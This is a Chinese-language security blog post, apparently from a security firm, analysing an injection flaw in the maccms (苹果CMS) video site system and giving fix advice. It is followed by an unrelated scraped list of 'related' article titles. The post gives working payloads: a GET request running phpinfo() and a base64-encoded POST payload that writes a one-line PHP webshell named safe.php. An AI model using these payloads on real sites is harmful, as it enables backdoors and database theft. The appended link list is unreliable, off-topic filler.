苹果cms系统,是目前很多电影网站都在使用的一套网站系统,开源,免费,扩展性较好,支持一键采集,伪静态化,高并发的同时承载,获得的很多站长的喜欢,于近日被网站安全检测发现,maccms存在网站漏洞,sql注入盲射获取数据库的管理员账号密码,关于该漏洞的详情,我们仔细分析看下.

maccms漏洞分析与修复

苹果CMS采用的是php语言开发的代码,使用的数据库是mysql类型,这种架构是比较常用的,也是比较稳定的,但是在安全方面出现的问题是比较多的,这次发现的是sql注入漏洞,在网站的根目录下的inc文件里的module目录下的vod.php代码如下图所示:

代码里的empty($wd函数,在进行判断如果是,或者不是的逻辑过程当中,会将前段用户访问带来的参数,进行安全过滤,我们跟进代码来追寻到苹果CMS的配置文件,在function.php配置文件代码李看到对网站的所有请求方式包括get、post、cookies的提交方式都强制性的进行了安全转义。网站漏洞问题的发生就在这里.

我们仔细又发现,maccms使用了360安全提供的防止sql注入拦截代码。360的防止sql注入是好几年前开发,并公开在网络上的,已经很久没有更新维护了并且还存在sql注入代码绕过的情况,参数值之间进行实体转换的时候,360的sql拦截规则没有对空白符以及反斜杠进行拦截,导致可以绕过插入恶意参数,直接请求到苹果cms后端数据库中去,获取苹果CMS的管理员账号密码。

我们来看下如何利用苹果CMS的漏洞,从上面漏洞发生的细节里可以看出,是因为拦截sql注入语句的过程中存在可以被绕过的漏洞。我们来使用%0b,以及空格对代码进行注入,sql语句在拼接中,可以插入反斜杠进行单引号的报错,从而绕过苹果CMS的安全拦截。语句如下:

GET请求:

http://127.0.0.1/index.PHP?m=vod-search&wd={if-A:phpinfo()}{endif-A}

可以直接看php的具体信息

POST请求

可以直接获取webshell

http://127.0.0.1/index.PHP?m=vod-search

POST内容如下:

wd={if-A:print(fputs%28fopen%28_decode%28Yy5waHA%29,w%29,_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

可以直接生成带有一句话木马后门的代码,文件名为safe.php,一句话木马链接密码是safe.

如何修复苹果cms网站漏洞呢?

对网站漏洞的修复我们要知道漏洞产生的原因,以及为何会绕过苹果CMS的安全过滤,maccms使用的addslash安全函数,sql中没有加单引号的安全防护,in字句也很容易忘记加引号,再一个后期处理安全过滤的时候可以插入单引号,stripslash导致可以加入单引号,编解码导致绕过addslash,使用urldecode编码进行注入绕过,根据上面提出的漏洞绕过,我们SINE安全提出漏洞修复的建议是:对URL解码进行双层的转义,对get,post,cookies的拦截规则进行安全更新,加强空格,以及百分符号的拦截,如果对程序代码不熟悉的话建议咨询专业的网站安全公司来处理解决。

getvod.php_网站漏洞修复之苹果cms电影系统相关推荐

  1. PrestaShop 网站漏洞修复如何修复

    2019独角兽企业重金招聘Python工程师标准>>> PrestaShop网站的漏洞越来越多,该网站系统是很多外贸网站在使用的一个开源系统,从之前的1.0初始版本到现在的1.7版本 ...

  2. PrestaShop 网站漏洞修复办法

    PrestaShop网站的漏洞越来越多,该网站系统是很多外贸网站在使用的一个开源系统,从之前的1.0初始版本到现在的1.7版本,经历了多次的升级,系统使用的人也越来越多,国内使用该系统的外贸公司也很多 ...

  3. Drupal 网站漏洞修复以及网站安全防护加固方法

    2019独角兽企业重金招聘Python工程师标准>>> drupal是目前网站系统使用较多一个开源PHP管理系统,架构使用的是php环境+mysql数据库的环境配置,drupal的代 ...

  4. 网站漏洞修复方案防止SQL注入攻击漏洞

    SQL注入漏洞在网站漏洞里面属于高危漏洞,排列在前三,受影响范围较广,像asp..net.PHP.java.等程序语言编写的代码,都存在着sql注入漏洞,那么如何检测网站存在sql注入漏洞? SQL注 ...

  5. 网站漏洞修复网站安全检测整体解决方案

    在很多网站系统构建的一开始,最注重的就是网站程序代码的安全,我们SINE安全对甲方网站公司部署过很多的网站安全系统,之前有一些网站设计公司对于每个项目都会由专人去负责开发与设计,并与甲方网站公司进行沟 ...

  6. 用python实现苹果cms电影网站的自动采集

    苹果cms电影网站的自动采集 用苹果cms搭建的电影网站,采集影片可以通过后台的自定义资源库链接资源网站.这种方式简单易操作.但是问题是采集的时候只有两种属性可以选择,一是可以选择影片类型,二是可以有 ...

  7. 网站漏洞修复公司处理网站被篡改跳转到其他网站的解决办法

    2019独角兽企业重金招聘Python工程师标准>>> 某一客户单位的网站首页被篡改,并收到网监的通知说是网站有漏洞,接到上级部门的信息安全整改通报,贵单位网站被植入木马文件,导致网 ...

  8. 网站漏洞修复对DiscuzX3.4论坛总是被篡改页面

    Discuz!论坛目前最新版本为3.4版本,已经好久没有更新了,我们SINE安全在对其网站安全检测的同时发现一处漏洞,该漏洞可导致论坛的后台文件可以任意的删除,导致网站瘫痪,后台无法登陆.关于该网站漏 ...

  9. 最新超漂亮UI仿芒果TV听书网站模板双端+苹果CMS内核

    正文: 苹果cms超漂亮UI高仿芒果TV听书网站模板带手机端. 手机版修改logo,ting_wap/images/logo.png 电脑版修改logo,ting_pc/img/logo.png 编辑 ...

  10. 万字长文带你 搞定 linux BT 宝塔面板 之外网上快速搭建苹果CMS电影网站

    文章目录 万字长文带你搞定宝塔面板 一.本地搭建宝塔面板及安装ecshop 1.1前言 1.2面板特色功能 1.3安装环境说明 1.4安装BT面板 1.5常用管理命令 1.6 BT面板一键安装LAMP ...

最新文章

  1. (转)TabContainer要实现服务器端回传
  2. apache http server 停止工作_配置nginx,Apache支持pathinfo模式-什么是phpinfo模式
  3. 深入理解Java:注解
  4. oracle9i 查询scn,Oracle10g的current_scn是如何计算的?
  5. html body标签
  6. 2015,鬼王Xun和GGL比赛,带给我们无尽的欢乐
  7. install java 7 or 8 on ubuntu14
  8. eXtremeComponents使用总结--1(转载)
  9. java之继承 封装 多态
  10. 2022年全国计算机二级Access数据库程序设计模拟试题及答案
  11. 地理坐标系:WGS84和BD09互转
  12. ajax hover,jQuery / 使用hover()和toggle()切换事件 - 汇智网
  13. 在 uni-app 中 使用字体图标
  14. 1u服务器系统风扇,1U工控服务器机箱介绍
  15. java三次样条函数求导_利用java语言对三次样条曲线的实现
  16. 串口转IAP然后到APP
  17. Django框架学习收藏
  18. 兰州拉面进非洲:一群80后的创业历险
  19. 使用Ultra Librarian将bxl文件转为OrCAD Capture CIS可识别的库文件(OLB)
  20. 西部世界看IPFS落地应用:媒体、视频和游戏领域中的 Filecoin

热门文章

  1. 大一新生HTML期末作业,网页制作作业(大一学生作品)
  2. 家庭生活保养保洁大全(化学保洁)
  3. mediawiki java_MediaWiki
  4. VSCode远程连接服务器报错:Could not establish connection to “xxx”,Faild to write install script to path!【已解决】
  5. 剑指 Offer(C++版本)系列:剑指 Offer 13 机器人的运动范围
  6. 关于深拷贝与浅拷贝的问题?
  7. 【致远FAQ】V8.0sp1_单位管理员账号在流程督办监控中撤销流程后,流程中的人员会收到消息提醒吗
  8. 二维baker映射 matlab,基于Baker映射的混沌图像加密算法
  9. 缺陷管理工具--mantis使用过程
  10. php读取服务器csv文件,PHP进行读取CSV文件数据和生成CSV文件